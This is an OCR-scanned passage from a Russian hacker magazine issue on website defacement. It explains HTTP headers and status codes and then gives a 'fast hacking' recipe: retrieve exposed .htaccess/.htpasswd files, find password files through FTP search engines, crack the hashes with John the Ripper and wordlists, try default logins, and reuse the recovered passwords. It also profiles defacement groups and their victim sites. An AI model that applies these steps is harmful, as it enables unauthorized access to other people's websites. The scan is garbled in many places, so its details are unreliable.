сразу. В большинстве случаев в запросе или ответе сервера сначала идут 
поля общих заголовков, а потом остальные. 
Accept - здесь перечисляются возможные типы и размеры получаемых 
данных, которые сможет принять клиент. Если допустимы все типы - 
ставятся символы */*. 
Accept-Charset - приводится набор символов поддерживаемых клиентом. 
Accept-Encoding - как и в поле Accept здесь указаны поддерживаемые 
кодировки данных в ответе. 
Accept-Language - перечислены языки требуемые в ответе. 
АЦом - приводится список методов поддерживаемых 
сервером, которыми клиент вправе воспользоваться. 
Authorization - содержит некоторую информацию: «удостове- 


ТРЕПАНАЦИЯ ПРОТОКОЛА: НТТР 


Сервер интерпретирует метод запроса, и созда- 
ет сообщение ответа. Оно состоит из заголовка, 
куда включаются статус сервера, информация 
о доставляемом документе, прочая информа- 
ция для клиента (разбросанная по полям, рас- 
смотренным выше) и сообщения. После чего 
сервер завершает сеанс связи. сме 
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рение», которую клиент должен предоставить для подключения к запре- 
щенным для анонимного доступа ресурсам. В случае неверной идентифи- 
кации клиента сервер в ответе посылает ошибку с кодом 403 (06 этом чуть 
далее). 
Content-Encoding - указан метод кодирования документа. Например: 
Content-Encoding: gzip 
Content-Language - содержит язык аудитории. Например, для российской 
и англоязычной аудитории этот параметр будет следующим: Content- 
Language: ru, en. 
Content-Length - здесь сервером возвращается размер тела передаваемых 
данных. 
Content-Type - тут находится тип возвращаемого сервером сообщения. К 
примеру, для gif-KaptuHKu: Content-Type: image/gif. 
Date - это поле общего заголовка, которое указывает Ha дату создания 
сообщения. Приводится она в своем формате, выглядящем так: Date: Fri, 15 
Aug 2002 10:00:00 GMT. 
Expires - поле содержащее дату и время при наступлении которого 
документ становится неактуальным. Обычно это выражается в 
недоступности документа в режиме автономного просмотра. Формат такой 
же, как и у поля Date. Однако если вместо даты стоит ноль, то документ 
моментально считается устаревшим. 
From - используется НТТР-клиентами, желающими, чтобы сервер «знал» их 
адрес электронной почты. Формат записи стандартный: From: 
ildar@arat.ru. Этот параметр обычно применяется в целях регистрации. 
Host - употребляется клиентом для указания URL в более простой форме, 
используется с методом бЕТ следующим образом: 

GET /pub/WWW/ HTTP/1.1 

Host: www.w3.org 
Таким образом, при выполнении этого запроса будет взят документ с 
http://www.w3.org/pub/WWW/ 
If-Modified-Since - это поле создано для использования условного 
запроса СЕТ. Документ возвращается клиенту, только если он обновился с 
момента указанной даты. Если документ не изменялся, то сервер возвратит 
код статуса 304. 
If-Unmodified-Since - противоположный по действию параметр. 
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Last-Modified - содержится дата и время последнего обновления ресурса. 
Location - хранится полный адрес прежней «дислокации» ресурса. 
MIME-Version - поле, указывающееся в запросе клиента, показывающее 
версию имеющегося протокола MIME. Протокол используется для работы с 
файлами различных типов. 

Referer - поле, позволяющее клиенту указывать серверу адрес, с которого 
он запрашивает ресурс. 

Retry-after - параметр возвращаемый сервером, в случае, когда имеется 
загруженность и сервер не может обработать запрос. Возвращается время, 
после которого клиент сможет повторить свой запрос, сопровождается все 
это кодом состояния 503. 

Server - здесь возвращается имя и версия НТТР-сервера. 

User-Agent - поле указывающее имя и версию НТТР-клиента. 
WWW-Authenticate - возвращается сервером в случае, когда клиент 
должен реализовать не анонимный авторизованный доступ. 
Сопровождается кодом состояния 401. 


Существует множество специфичных полей, также используемых в этом 
протоколе. Здесь перечислены самые основные. 

Теперь остается рассмотреть действия сервера на заявленный запрос 
клиента. Сервер интерпретирует метод запроса, и создает сообщение 
ответа. Оно состоит из заголовка (header), куда включаются статус сервера, 
информация о доставляемом документе, прочая информация для клиента 
(разбросанная по полям, рассмотренным выше) и сообщения. После чего 
сервер завершает сеанс связи. 


Давай посмотрим, что такое статус сервера. Имеется целый набор кодов 

статуса сервера, они разделены на типы: 

Первый тип - информационный, означающий, что запрос получен и 

обрабатывается. Сюда включены коды с 100 до 199. 

100 Continue - клиент должен продолжить свой запрос. 

101 Switching Protocols - сервер переключает протокол по требованию 
клиента, указанному в поле Upgrade. 

Второй тип - успешно обработанные запросы: 

200 OK - запрос был успешно выполнен, возвращаемая информация 


зависит от метода указанного клиентом. 

201 Created - запрос был выполнен, в результате чего был создан новый ресурс. Его расположение 
возвращается в поле Location. 

202 Accepted - запрос принят, но его обработка не закончена. Фактически запрос может и не 
выполнится. 

203 Non-Authoritative Information - возвращаемая в заголовке информация не оригинал, а взята 
у третьей стороны. 

204 No Content - сервер выполнил запрос, но из-за отсутствия информации возвращает лишь код 
статуса и заголовок. 

205 Reset Content - запрос выполнен и клиентская программа (браузер) должна очистить 
документ (форму) инициирующую запрос. 

206 Partial Content - сервер возвращает лишь часть документа затребованного объема. 

Следующий тип - коды с 300 по 399 - они указывают на то, что запрос не выполнен, и для его 

достижения клиент должен предпринять дополнительное действие. 

300 Multiple Choices - запрошенный URI имеет несколько представлений. В качестве такого 
множества может выступать разбиение по языкам. В заголовке возвращаемого ответа 
сервером может содержаться информация, конкретизирующая запрос. 

301 Moved Permanently - запрошенный ресурс перенесен на другой постоянный URI, указанный в 
поле Location. 

302 Moved Temporarily - документ, указанный в запросе временно перенесен на другой URI, 
указанный в поле Location. 

303 See Other - запрашиваемый URI может быть найден под другим адресом, его следует 
запрашивать методом GET. 

304 Not Modified - это ответ сервера на условный запрос с полем If-Modified-Since, означающий, 
документ не изменялся и клиент должен использовать локальную версию документа. 

305 Use Proxy - обращение к запрошенному ресурсу должно производиться через прокси-сервер, 
указанный в поле Location. 

Четвертый тип кодов - начинающиеся с цифры 4. Они говорят об ошибочном запросе со стороны 

клиента. 

400 Bad Request - запрос содержит синтаксическую ошибку. Клиенту следует исправить запрос. 

401 Unauthorized - запрос подразумевает подтверждение подлинности клиента. Требуется 
повторить запрос с полем Authorization. 

402 Payment Required - зарезервированный, еще не используемый в HTTP код. 

403 Forbidden - сервер принял запрос, но отказывается на него отвечать. Возможно, имеется 
нарушение прав доступа. 

404 Not Found - документ по данному URL не найден. 

405 Method Not Allowed - метод для данного запрашиваемого ресурса не дозволен. Сервером 
также возвращается список разрешенных методов в поле Allow. 

406 Not Acceptable - документ по данному адресу существует, однако формат ресурса He 
соответствует запрашиваемому клиентом. 

407 Proxy Authentication Required - указывает на то, что пользователь должен сначала 
подтвердить свою подлинность прокси-серверу. 

408 Request Time-out - истекло время ожидания сервера, при котором клиент мог завершить 
запрос. Требуется снова произвести подключение. 

409 Conflict - запрос не может быть выполнен вследствие конфликта с текущим состоянием 
документа. Сервер также в заголовке возвращает информацию о причине конфликтной 
ситуации. 

410 бопе - требуемый ресурс удален с сервера и не может быть предоставлен. 

411 Length Required - сервер отказал в обработке ресурса из-за отсутствия в заголовке запроса 
поля Content-Length определяющее длину документа. 

412 Precondition Failed - условия указанные клиентом в заголовке запроса оказались ложными. 

413 Request Entity Too Large - причина отказа сервера в данном случае - достаточно большой 
объект запроса. Если это положение временно, то в заголовки ответа включается поле Retry- 
After. 

414 Request-URI Too Long - сервер выдает отказ вследствие большой длины в адресе указанного 
ресурса. 

415 Unsupported Media Туре - сервер отказывается обработать запрос из-за формата объекта 
запроса, тип которого не поддерживается ресурсом для запрашиваемого метода. 

Последний тип - коды статуса, отвечающие за ошибки сервера, находятся в диапазоне, начиная с 

500-го по 599-й. 

500 Internal Server Error - на сервере возникла внутренняя ошибка, не позволяющая ему 
выполнить запрос. 

501 Not Implemented - методы указанные клиентом не поддерживаются сервером для любого 
ресурса. 

502 Bad Gateway - сервер получил недопустимые сведения от другого сервера, при попытке 
осуществить запрос клиента. 

503 Service Unavailable - временно нет возможности обработать запрос, при этом в заголовке 
возможно указание времени возобновления функционирования сервера. 

504 Gateway Time-out - сервер не дождался ответа от другого сервера при попытке обеспечить 
выполнения запроса. 

505 HTTP Version not supported - не поддерживается версия протокола HTTP, указанная в запросе 
клиента. 

Как видно в нашем случае, при обращении к ресурсу www.rambler.ru все прошло успешно. 


ВШИВАЕМ ОРГАНЫ ОБРАТНО 


Вот мы и более-менее ознакомились с самым юзаемым протоколом — HTTP. Это, конечно, не все — 
так, самые основы, но в контексте дефейса — самое оно. Если когда-нибудь Спеце будет писать о 
сетевом программировании на уровне НТТР, придется вникать во все это дело более подробно ;). 


Будем надеяться, что придется! 
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HTACCESS 
Ц .HTPASSWD 


рецепт скоростного взлома 
MOOF (moof@real.xakep.ru, 


http://moof.ru) 


ЧТО ТАКОЕ, КТО ТАКОЙ? 


Для начала давай разберемся, о чем мы будем говорить. А будем го- 
ворить мы о двух файлах со странными именами, начинающихся с 
точки: .htaccess и .htpasswd. Файл .htaccess используется для изме- 
нений настроек сервера для отдельных файлов или каталогов. С его 
помощью мы можем задавать реакцию веб-сервера на различные 
ошибки (например, если не найдена страница), менять типы файлов 
(сделать так, чтобы файлы с расширением .html выполнялись интер- 
претатором php) и, что самое интересное, ограничивать доступ паро- 
лем. .htaccess - это обычный текстовый файл, в котором содержится 
инструкции для веб-сервера. Кстати, на самом деле файл может на- 
зываться и по-другому, в конфигурации сервера Apache есть специ- 
альный параметр AccessFileName, который задает имя этого файла. 
Но 99% администраторов его, конечно, не меняют. Второй файл - 
.htpasswd - содержит набор логинов и паролей в зашифрованном 
виде. Создается он в том случае, если мы хотим ограничить доступ к 
какой-нибудь части сайта или к отдельной страничке. 


ВНУТРЕННОСТИ 
Прежде чем начать говорить о способах получения доступа, необхо- 
димо разобраться в содержимом файлов .htaccess и .htpasswd. Дей- 
ствие файла .htaccess распространяется на каталог, в котором этот 
файл находится, и на все подкаталоги. Поэтому если файл положить 
в корень, то изменятся настройки всего сайта. Итак, содержимое 
файла .htaccess может содержать следующие настройки: 


DirectoryIndex index.shtml index.html index.htm 


Задает список файлов, к которым сервер будет обращаться «по умол- 
чанию». Если набрать адрес www.server.com/news/, то сервер спер- 
ва будет искать файл index.shtml. Если его не окажется, то сервер 
будет стараться открыть следующий файл по списку (index.html). И 
так до конца. Если ни один файл не будет найден, то сервер вернет 
ошибку 404 - файл не найден. 


ErrorDocument 404 /404.html 


Этой командой задается имя html-caiina, отображаемого при воз- 
никновении ошибки 404. Можно создать файлы и для других оши- 
бок: 500 - ошибка выполнения скрипта, 403 - доступ запрещен ит.д. 
Полный список ошибок, генерируемых сервером, можно посмотреть 
на сайте apache.org, например. 


Options Indexes 


Этой командой мы разрешаем серверу отдавать в браузер содержи- 
мое каталога. Если у нас нет индексного файла в каталоге и мы на- 
пишем www.server.com/list/, то увидим список файлов. Для того что- 
бы отключить просмотр каталога, перед Indexes надо поставить «-». 


Существует еще огромное множество команд. Обо всех, к сожале- 
нию, рассказать не получится. Если тебе будет интересно, зайди на 
citfroum.ru, webclub.ru, lib.ru, webscript.ru и почитай документацию, 
там все подробно описано. 


БЛИЖЕ К ТЕЛУ 
Ho нас интересует та часть .htaccess, с помощью которой можно за- 
паролить доступ к сайту. 


AuthName «Закрытая зона» 
AuthType Basic 
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Для того чтобы получить доступ к сайту, 

совсем необязательно использовать дыры 

в программах. В некоторых случаях невнимательность 
владельцев сайта приводит к тому, что для взлома 
сайта достаточно найти файл паролей. Об Апаче, 
паролировании директорий и о невнимательности 
админов мы и поговорим. 


require valid-user 
AuthUserFile /home/server/www/members/. htpasswd 


Таким файлом обычно паролируют доступ к каталогу. В последней 
строчке ты можешь увидеть путь к заветному файлу с паролями. Но 
не все так просто, к сожалению. Пароли, само собой, зашифрованы. 
В нашем случае файл с паролями называется .htpasswd (и так OH на- 
зывается почти всегда). Внутри .htpasswd’a ничего интересного нет. 
Только логины. Вот типичный пример файла с паролями: 


admin:$apr1$iF0.....$NqzjSZqVTxk3U6ais8GMa0 
moof:$apr1$GGO.....$1jJkOn2Y8hj6ZNZBRMVZB/ 
xakep:$apr1$qGO0.....$XVjN9TN8XjDLoVrAKNWUu. 


Вначале идет логин пользователя, потом разделитель (двоеточие 
«:») и зашифрованный пароль. По умолчанию пароли шифруются 
алгоритмом МОБ. 

Создается файл паролей с помощью утилитки «htpasswd». Она вхо- 
дит в состав сервера Apache, так что с ее поиском никаких проблем 
быть не должно. Для того чтобы создать новый файл с паролями, ис- 
пользуй команду: 


htpasswd -с .htpasswd admin 


Ключ -с нужен для создания нового файла, далее мы указываем имя 
файла («.htpasswd») и первого пользователя («admin»). После чего 
тебе просто надо будет два раза ввести пароль, и файл будет готов. 
Для того чтобы добавить нового пользователя, использую точно та- 
кую же команду, только без ключа -с. В этом случае в уже существу- 
ющий файл будет добавлен новый пользователь. 

Как ты понимаешь, если пароль можно зашифровать, то его можно и 
расшифровать. Это, конечно, не просто и требует достаточно боль- 
шой вычислительной мощи. Ты, наверное, слышал о программе John 


the Ripper. Это относительно старая программа предназ а для 
подбора паролей. Скачать программу можно с официа. Ta 


http://www.openwall.com/john/, там же ты найдешь ее варианты для 
windows, unix и dos. 

Подбираются пароли простым перебором, так что времени на под- 
бор может уйти достаточно много. Но если паролей много, то высо- 
ка вероятность того, что большая их часть будет расшифрована. 
Шансы расшифровать пароли увеличивают специальные словари на- 
иболее часто используемых паролей. Такие словари это просто на- 
бор слов, которые люди любят употреблять в качестве паролей. Сло- 
ва типа password или имена (домашних животных, например). 


ACTION! 
Теперь, когда ты знаешь все или почти все о запароленных зонах Ha 
сайтах, умеешь создавать такие зоны и расшифровывать пароли, пора 
перейти к самому главному. А именно - к добыванию файлов с пароля- 
ми. Как уже не один раз говорилось, нерадивость администраторов, не- 
внимательность веб-мастеров очень часто играют на руку взломщикам. 
На правильно настроенных серверах файлы .htaccess и .htpasswd че- 
рез браузер посмотреть не удастся. Но в безграничных просторах Ин- 
тернета существует множество серверов, которые легко позволят это 
тебе сделать. Мне довелось общаться с зарубежным хостером, кото- 
рый меня уверял в полной безопасности их сервера. Когда я спросил, 
слышали ли они о John the Ripper, суппорт хостинга очень удивился 
и заявил, что это не проблема и не стоит из-за нее волноваться, яко- 


бы с любого сервера можно легко скачат 
.htaccess и .htpasswd :). 
Итак, для того чтобы достать пароли, 


Сперва попробуем посмотреть его в корне 
вера: www.server.com/.htaccess. Нам может по- 
везти, а может и нет. Если файл там есть и он не за- 
щищен, то мы увидим его содержимое в браузере. Теперь, 
когда мы знаем путь к файлу с паролями, мы так же легко получаем 
его в браузере. Если ты думаешь, что все это ерунда, и ни один ад- 
мин в здравом уме не оставит файл с паролями просто так лежать на 
всеобщем обозрении, попробуй зайти на www.filesearch.ru и поис- 
кать файл .htpasswd. filesearch.ru это поисковик, который ищет фай- 
лы Ha ftp-cepBepax. Уверяю, результаты поиска тебя удивят. Теперь 
скажи мне, что тебе мешает скачать этот злополучный файл с паро- 
лями и расшифровать его? Правильно - ничего не мешает. 


Иногда бывает так, что файлы с паролями лежат в запароленных ча- 
стях сайта. И чтобы достать все пароли, необходим один-единствен- 
ный пароль для этой закрытой части. В этом случае надо попробо- 
вать стандартные комбинации логин/пароль типа: test/test, 
guest/guest, admin/nimda и т.д. 

В большинстве случае ты сможешь получить пароли от закрытых ча- 
стей сайта, от панелей управления сайтом, от различных систем ад- 
министрирования. Я неоднократно сталкивался с тем, что пароли от 
закрытой части сайта и от Ёр совпадают. Так что получить полный 
доступ к сайту тебе ничего не мешает. 


НАРРУ ЕМО 
Естественно, просто так ломать сайты из-за того, что они ломаются, не 
надо. От тебя гораздо больше пользы будет, если ты напишешь админи- 
стратору о проблеме и попросишь халявный хостинг, например. :) И, 
как ты поминаешь, все, что я здесь написал, я сам никогда не пробовал. 
И сайты сам не взламывал. В нашем селе просто нету Интернета, а все 
это сгенерировал автоматический генератор бреда. 
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Вроде бы все очень просто. Мне нужно было всего лишь 
раскопать информацию о сайтах хак-групп, занимающихся 
дефейсами. На самом деле найти cil ek по дефейсным 
хак-группам оказалось не так просто. Во-первых, у некоторых 
нет собственных сайтов принципиально, или же их закрыли в 
очередной 101-ый раз. Во-вторых, многие хак-группы 
базируются только в IRC, ощущая себя там намного 
комфортнее и уютнее, Ну и, в-третьих, многие дефейсы порой 
делаются малоизвестными хак-группами или отдельными 
личностями, которые двигают только свой лейбл, не указывая 
никакой дополнительной информации о себе. Им просто это 
не нужно. Несмотря на все эти гипермегасложности, мне 
удалось надыбать для тебя немного ценной и интересной 
информации в Инете. Поехали. 


Андрей Каролик (andrusha@sl.ru) 


::: DHG Group ::: 

Прописка: www.dhgroup.org 

IRC: irc.dal.net.ru (#DHG, #BugTraq) 

Мемберы: D4rkGr3y, r4ShRaY, Yosic, BladeSting, DethSpirit, Joker, 
B@rsik, Drewbu 

Последние взломы: www.e-online.ru, www.codenco.com, www.osd- 
cubicles.com, www.racinghotels.com, www.acqtrain.com. 


Что хорошего на сайте: 

Первое, что меня огорчило, количество статей на сайте подкачало, +0 сть 
суровая надежда на продолжение. Зато все тексты не ворованы (° 4[\/`4>: 
сайтов, а написаны самими мемберами группы. В основном это дсс`“/пное 
разъяснение дефейса на практике (приводятся собственные нараёотки} 
Всегда приятно, когда с тобой делятся своим опытом :). Кроме этого, на сай-. 
те можно ознакомиться с описанием некоторых багов и слить приведенные 
полезные программки и скрипты. Очень удобно, что к каждой программной 
единице есть краткое описание, а не просто название и ссылка. Ребятам 
нужно поднажать на количество материалов, тогда сайту цены не будет. 


;:: RootTeam ::: 

Прописка: http://rootteam.host.sk 

Мемберы: devOid, LynX, Xarth 

Последние взломы: www.projektzwo.de, www.billiardfanatic.com, 
www.sigesgroup.it, www.hondaclub.ru, www.mirmex.ru, ... 
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Что хорошего на сайте: 

Приятно удивило количество и качество статей, написанных мемберами 
группы. Все они для простоты поделены на категории: UNIX, Advisories, ко- 
динг, безопасность, взлом, разное, новичку. Есть на сайте и несколько ре- 


лизов группы, описание сд1-ых багов и эксплойты под win и *nix. Пользуй- 
ся. 


;:: KodsWeb Team ::: 

Прописка: www.kodsweb.org 

IRC: irc.dal.net (#kodswebteam), irc.dal.net.ru (#kodsweb) 

Мемберы: {dr}{NerVe}, Drakula, VooD002029, Monster, LamO, Sky Lynx, 
Aspirin (были, но выбыли: St@keR, exc[ee]d, Nokya, Infernal, Skids) 
Последние взломы: www.whv3.com, www.subloop.com, www.albafo- 
rum.com, www.xboxmaniacs.com, www.pskratch.com... 


Что хорошего Ha сайте: 

Сайтик у них довольно обширный. Есть даже собственная новостная колон- 
ка, но могли бы обновлять ее и почаще. На сайте есть приличное количест- 
во (порядка 100) полезных программ, разбитых по категориям: Network 
Security, Криптозащита, Scanners, Remote Administration Tools, Password 
Crack, Wordlists, Other Utilits, Spy Programms. Есть релизы группы, несколь- 
KO десятков статей от мемберов, несколько учебников и мануалов в элек- 
тронном виде и обширный список сд1-ых багов. Изучай на здоровье. 


;:: Hackers Castle [Astero-ID hack group] ::: 

Прописка: http://hackcastle.hut.ru 

Мемберы: DocSoft, 2NetFly, Nexeger, Fido_nety, Kibizoid, Jedi Knight 
Последние взломы: www.gaws.net, www.btfdetailing.com, 
www.svencogroup.com, www.drossmangroup.com, www.aismedia- 
secure.com... 


Что хорошего на сайте: 

Сайтик сделан по принципу «всего понемножку». В разделе 
софт валяется всего две программулины (позор!), а все ос- 
тальное настоятельно советуют искать в Инете самостоятель- 


но :). Есть несколько статей мемберов группы, но, честно говоря, малова- 
то будет. Зато раздел багов (bugs) интересен тем, что, в отличие от других 
подобных сайтов, приведены не только сами баги, но и подробное разже- 
вывание мемберами, как их использовать на практике (с собственными 
примерами). Что же, будем с нетерпением ждать новых поступлений от 
Astero-ID. 


::: DNS Group ::: 

Прописка: http://dns.by.ru 

Мемберы: DNS, SheLz, Corpse, Faust 

Последние взломы: www.adil.be, www.alientelecom.ru, 
www.alfastar.lvs.ru, www.cital.fh-konstanz.de, www.knet.ru... 
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Что хорошего на сайте: 

Тут есть и хорошие статьи мемберов группы, и примеры взломов, и структу- 
рированный каталог софта (вири, трояны и бэкдоры, сканеры, нюки, encod- 
ing, mail атака), и описание некоторых багов. Но опять вездесущая пробле- 
ма - всего слишком мало. Есть даже местный фак (FAQ) и местный чат (вре- 
менно накрылся медным тазом). Я очень смачно похихикал, когда заметил, 
что все 285 записей в гостевой книге полностью посвящены перепалке не- 
кого DD (без домашнего адреса) и Faust. Непонятно только, почему этот 
флейм не стирают. 


:;:: The NObOD1eS ::: 

Прописка: http://r00t.h1.ru/N.php 

IRC: irc.dal.net (#nteam) 

Мемберы: [ROOT], -::[C++]::-, bio3k, Bash, Lord Ch003s, xidden 
Последние взломы: http://spawn.non.ru, http://www.pager.kg, 
http://rOot.h1.ru (часть взломов не указана в целях безопасности группы) 


Что хорошего на сайте: 

(Сайта отдельного как такового нет. Все это дело пылится в одном из разде- 
лов на личной страничке основателя (founder) группы [ROOT]. Может по- 
влияло то, что группа очень молодая (создана в конце июля 2001 года), а 
может то, что мемберы жутко ленивые создания :). Хотя на сайте [ROOT] 
есть его собственные статьи (вперемешку со статьями непонятных личнос- 
тей). Порадовала обширная коллекция с91-ых багов, эксплойтов, бэкдоров, 
логотерок, тулзов, рутовых причиндалов, проксей и разных других полез- 
ных вещиц. Смотри, скачивай, пользуйся :). 


ss: GipsHackers Crew ::: 

Прописка: http://gipshack.ru 

Мемберы: Moby, Orb, Foster, Oleg 

Последние взломы: www.router-info.de, www.onlinelads.com, 
www.computerhelp.ru, www.keithandmike.com, 
www.blenderwars.com... 


Что хорошего на сайте: 
На сайте довольно много статей (больше 100), программ (больше 50) и ано- 


Дефейсмент-группы 


нимных проксей (почти 100). Часть статей собрана из Инета, а часть напи- 
сана мемберами группы. Некоторые статейки я нашел очень даже занятны- 
ми, так что по сайту тебе полазить стоит. 


В отличие от наших, забугровые дефейсные хак-группы по тем или иным 
причинам не имеют своих сайтов, оставляя только на взломанных сайтах 
свои лейблы, логотипы и мылья для контактов. То ли они следить не хотят, 
то ли не считают нужным делиться своими секретами с другими. Но необ- 
ходимость в сайте отпадает. Появляются только сайты, собирающие мирро- 
ры (зеркала) взломанных сайтов, чтобы досталось наследникам. Сканиро- 
ванием этих архивных сайтов я и занялся. По крупицам вылавливал инфор- 
мацию о забугровых хак-группах и в 
ё результате пришел к заключению, 
что большинство обитают в ТВС. Если 
тебя припрет с ними пообщаться, то 
вот список наиболее активных в 
2002 году хак-групп, серверов и ка- 
налов, на которых они обитают (для 
многих хак-групп привожу список 
мемберов). 


Crookies (Supr3mo, LOrd_3viL, LOrd_ByrOn, EvilByte) - #crookies 
(irc.brasnet.org) 

Cyb3r Attack (Chucrilhos, Big_R1d3r, fr34k4z01d, ThinkerCrow, yOung- 
ThieF) - #cyb3rattack (irc.brasnet.org) 

Crime Lordz (AciDBraiN, D4rKLOrD, p4n3L, SpeedStream) - #CrimeLordz 
(irc.brasnet.org) 


Digital WrapperZ (m4st3r_syst3m, dropper) - #digitalwrapperz (irc.bras- 
net.org) 

Нах0г lab (fOul, USDL) - #haxOrs (irc.brasnet.org) 

M47R1X - #digitalkill3rz (irc.brasnet.org) 

Silver Lords (Lord Choo3s, ScorpionKTX, xscream) - #silverlords (irc.bras- 
net.org) 

Hacker Squad (DaDieHard, 

#HackerSquad (irc.brasnet.org) 
BHS - #BHS (irc.brasnet.org) 


Photon, BLAD3, kurz, RShooter) - 


Perfect.Br (А-1-0-5, L4RV4, Or4culo, Gui_) - #perfect_br 
(irc.brasnet.org) 
Web Angels (SlAyD, Z3r0_B1t3, D4rk_SOul) - #web_angels 
(irc.brasnet.org) 


OutSiders - #outsiders (irc.brasnet.org) 

Attacked SOul (SharK_r0Ot, z3r0_kill3r) - #attacked (irc.brasnet.org) 
BHI ([iD4n], ReFleX, Wir3less, Hack3r, Riss-Q, arpa) обитает Ha 
Irc.accessIrc.net - #BHi (irc.accessirc.net) 
HiddenLine - #hiddenline (irc.dal.net) 
MedanHacking (DangoL, micrOsOft, 
#MeDanHacKinG (irc.dal.net) 


StarCraft, JaGiRinG) - 


P.S. Это только небольшая часть дефейсного флота, который ежеднев- 
но громит весь мир и топит шлюпки ламеров :). 


UHPA 
по DEFACE 
В CETU 


это стоит почитать 


mopy (mopy@xakep.ru) 


Настроен на дальнейшее углубление своих знаний в 
области дефеса? Если да, то давай пройдемся по 
сети и посмотрим, чего там интересного можно 
вычитать по этой теме. Инфы будет море, так как 
сама тема обширная, поэтому выбирать будем очень 
придирчиво - это нормально, когда есть из чего 
выбирать :). Приступим. 


Талмуд: Руководство по РНР 
URL: http://www.stack.ru/~julia/PHP4/index.html 


Это довольно обширное руководство по РНР. Если переконвертировать 
его в бумажный формат, получится здоровенная книженция. Оно и по- 
нятно — сейчас без РНР далеко не уедешь, уж очень популярным он 
стал. Кстати, к сведенью дефейсеров, в РНР встроена специальная за- 
щита против использования метасимволов в запросах, поэтому поло- 
вина самых халявных взломов отбрасываются автоматически :(. Так 
что, если ты решил углубиться в Deface, РНР выучить придется. Советую 
начать с этого талмуда — хороший kick start. Во всяком случае, выгля- 
дит он очень и очень основательно. Все рассмотрено до мелочей и 
очень подробно. Описана каждая функция. Одно плохо — талмуд еще 
полностью не переведен на русский язык, так что в некоторые главы 
(их пока большинство) придется вникать на фиглише :(. 


Талмуд: RFC 2068. ПРОТОКОЛ ПЕРЕДАЧИ ГИПЕРТЕКСТА НТТР/1.1 
URL: http://www.gs-systems.com/rusdoc/http_11/index.html 


Всемирный закон равновесия работает исправно. Если где-то чего-то 
нет (например, перевода на русский), то где-нибудь в другом месте это 
что-то появляется. Нам предлагают почитать на досуге спецификацию 
протокола НТТР (ВЕС 2068) на русском языке. На самом деле, вещь по- 
лезная. Коротко, четко, понятно — как и все RFC. Но не до конца по- 
дробно - уже который раз замечаю, что читая RFC нахожу не всю необ- 
ходимую мне инфу :(. Это я вконец сдурел или RFC стух? Наверное, я :(. 


Талмуд: Вопросы и ответы по безопасности в WWW 
URL: http://it-s.visti.net/www-security-faq/wwwsf4.html 
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ИНФА ПО DEFACE В СЕТИ 


Здоровенный ФАК по безопасному Сб[-программированию. Не всеобъ- 
емлющий, но для начального ознакомления вполне сойдет (потом уже 
можно будет купить какую-нибудь книжку). Что еще хорошо - в этом 
талмуде обговариваются некоторые довольно тонкие моменты, кото- 
рые будут очень полезны, если рассматривать все это дело с позиции 
дефейсмента. Прикол: мне показалось, что по стилю (не по содержа- 
нию!) вопросы звучат немного по-ламерски наивно. Выглядит доста- 
точно забавно :). 


Талмуд: Руководство по хостингу 
URL: http://support.darkzone.ru/manual/ 


Не совсем талмуд, а скорее брошюра. Но очень полезная!!! Тут описы- 
вается весь процесс покупки хостинга и открытия своего проекта. При- 
водятся ценные рекомендации по настройке DNS, по настройке самого 
вэб-сервера, по управлению виртуальными хостами, по управлению 
папками. Очень полезно знать, как проходит весь процесс становления 
сайта на виртуальном хосте — пригодится, если потом придется дефей- 
сить такой сайт ;). 


Талмуд: Официальный мануал по Apache 2.0 
URL: http://httpd.apache.org/docs-2.0/ 


0 полезности этой штуки и говорить не стоит - так все ясно. Вне зави- 
симости от того, полезная она или нет, Apache остается одним из наи- 
более популярных вэб-серваков, а это уже автоматически обязывает 
любого перца, изучающего дефейс, прочитать это руководство. никуда 
не денешься :). 


Талмуд: Переменные окружения CGI 
URL: http://www.webclub.ru/content/protocols/article-79.html? print 


Не талмуд, и не книжка, и He брошюра. Это просто таблица. Зато какая 
полезная!!! Одно время я долго не мог найти полного списка этих са- 
мых проклятых переменных, пока не купил где-то книжку. Обязательно 
сохрани себе куда-нибудь эту табличку! Если ты собрался изучать де- 
фейс, без нее тебе не обойтись — наверное, четверть всех дефейсов де- 
лается не без участия переменных окружения. 


На этом наше ползанье по информационным просторам инета завер- 


шается. Инфы еще очень много — всю сразу не раскопаешь :). Так что 
давай, дружище, дерзай! Ic 
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В КАЖДОМ НОМЕРЕ: 


Обзор пучших моделей ноутбуков 

Тесты карманных компьютеров 

Как организовать мобильный офис 

Беспроводной доступ в интернет 

Полезные советы по выбору цифровых фотокамер 
Смартфоны, коммуникаторы, бРАЗ-телефоны 
Свежие новости и многое другое 
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2. Заполнить квитанцию (или 
ксерокопию). Стоимость 
подписки заполняется из 
расчета 100 рублей за 1 журнал. 
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| 

| 

| 

| 

| 

I (отметьте квадраты, соответствующие календарным месяцам выхода журнала, 

| 
доставка заказной бандеролью. Ф.И.О. 

| 

| 

| 

| 

| 

| 

| 

| 


которые вы хотели бы получить) 


ПОЧТОВЫЙ АДРЕС: индекс областькрай 


Город/село ул. 


3. Перечислить стоимость 
подписки через сбербанк. 


Дом корп. KB.. КОД тел. 


4. Обязательно прислать в 
редакцию копию оплаченной 
квитанции с четко заполненным 
купоном или по адресу: 

103031, Москва, Дмитровский 


Сумма оплаты 


Подпись Дата е-тай: 


Копия платежного поручения прилагается. 


переулок, д 4, строение 2, а аа ee ee аи аа и аа Ш Se 
ООО "Гейм Лэнд", с о Е >< Е 
пометкой "Редакционная 

подписка" 


Извещение ИНН 7729410015 ООО"ГеймЛэнд" 
р/с №40702810700010298407 
к/с №30101810300000000545 
БИК 044525545 


или по электронной почте 
subscribe_xs @gameland.ru 
или по факсу 924-9694 
(с пометкой "редакционная 
подписка"). 


БОНУС! 


При оформлении годовой под- 
писки на 2003 год - 2 свежих 
номера в подарок!!! 

При оформлении подписки на 
1-е полугодие 2003 года - один 
журнала в подарок!!! 


Плательщик 


Адрес (с индексом) 


Назначение платежа Сумма 


Оплата журнала "ХакерСпец" 
за 200 _г. 


Подпись плательщика 


Кассир 


ВНИМАНИЕ! 
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| 
| 
| 
| 
| 
| 
| 
| 
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| 
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номера, выходящего через 
один календарный месяц 
после оплаты. Например, 
если вы производите оплату в 
Сентябре, то подписку можете 
оформить с ноября. 

Подписка оформляется на 
любой срок. 


ИНН 7729410015 ООО"ГеймЛэнд" 
р/с №40702810700010298407 

к/с №30101810300000000545 

БИК 044525545 


Плательщик 


Адрес (с индексом) 


СПРАВКИ 
по электронной почте 
subscribe_xs@gameland.ru 


Назначение платежа Сумма 


Оплата журнала "ХакерСпец" 
за 200_г. 


или по тел. (095)292-3908, 
292-5463 


Квитанция 


Подпись плательщика 


Кассир 


UHTEPBbIO 
